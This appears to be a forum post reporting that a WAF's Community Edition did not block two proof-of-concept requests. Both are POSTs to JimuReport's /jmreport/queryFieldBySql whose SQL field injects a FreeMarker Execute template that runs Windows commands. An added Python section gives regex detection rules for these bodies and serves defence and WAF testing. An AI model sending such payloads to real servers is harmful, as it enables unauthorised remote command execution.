Posted 3 months ago
masker
Updated 3 months ago
Neither of the two PoCs below was blocked; the version is the Community Edition.
poc1:
POST /jmreport/queryFieldBySql HTTP/1.1
Host: xxx.xxx.xxx.xxx
X-Forwarded-For: 47.94.167.173
X-Forwarded-Host: xxx.xxx.xxx.xxx
X-Forwarded-Proto: https
Content-Length: 100
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Cache-Control: no-cache
Pragma: no-cache
Request body
{"sql":"select '<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("tasklist") }' "}
poc2:
POST /jmreport/queryFieldBySql HTTP/1.1
Host: xxx.xxx.xxx.xxx
X-Forwarded-For: 47.94.167.173
X-Forwarded-Host: xxx.xxx.xxx.xxx
X-Forwarded-Proto: https
Content-Length: 105
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; http://www.baidu.com/search/spider.html)
Accept: */*
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json
Cache-Control: no-cache
Pragma: no-cache
Request body
{"sql":"select '<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("cmd /c dir C:") }' "}
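A detection check for the two request bodies in the post above, as an added example that is not part of the original post and is not the WAF's own rule set. The rule names, the patterns and the helpers `normalize` and `inspect_request` are assumptions of this example; the benign and escaped sample bodies are constructed.

```python
import re

# Endpoint taken from the post; rule names and patterns are assumptions of this example.
JMREPORT_PATH = "/jmreport/queryFieldBySql"

# FreeMarker constructs that have no legitimate place inside a SQL string.
RULES = {
    "ftl_directive": re.compile(r"<#\s*(assign|include|import|setting|global|local)\b", re.I),
    "ftl_new_builtin": re.compile(r"\?\s*new\s*\(", re.I),
    "ftl_dangerous_class": re.compile(
        r"freemarker\.template\.utility\.(Execute|ObjectConstructor|JythonRuntime)", re.I),
    "ftl_interpolation_call": re.compile(r"\$\{[^}]*\("),
}

# Request body of poc1 exactly as posted (not valid JSON: the inner quotes are unescaped).
POC1_BODY = r'''{"sql":"select '<#assign ex="freemarker.template.utility.Execute"?new()> ${ ex("tasklist") }' "}'''
# Constructed samples: an ordinary query, and a harmless directive hidden behind a JSON \u escape.
BENIGN_BODY = '{"sql":"select id, name from orders where total > 10"}'
ESCAPED_BODY = r'''{"sql":"select '\u003c#assign x=1>' "}'''


def normalize(body):
    """Decode JSON \\uXXXX escapes on the raw text, so matching does not
    depend on the body parsing as valid JSON."""
    return re.sub(r"\\u([0-9a-fA-F]{4})", lambda m: chr(int(m.group(1), 16)), body)


def inspect_request(method, path, body):
    """Return the sorted names of the rules that matched; an empty list means not flagged."""
    # endswith() tolerates a context-path prefix in front of the endpoint.
    endpoint = path.split("?", 1)[0].rstrip("/")
    if method.upper() != "POST" or not endpoint.endswith(JMREPORT_PATH):
        return []
    text = normalize(body)
    return sorted(name for name, rx in RULES.items() if rx.search(text))


if __name__ == "__main__":
    samples = [("poc1", POC1_BODY), ("benign", BENIGN_BODY), ("escaped", ESCAPED_BODY)]
    for label, body in samples:
        print(label, inspect_request("POST", JMREPORT_PATH, body))
```

Because the check runs on the raw body text, it still fires when the body is not well-formed JSON, as is the case for both bodies as posted.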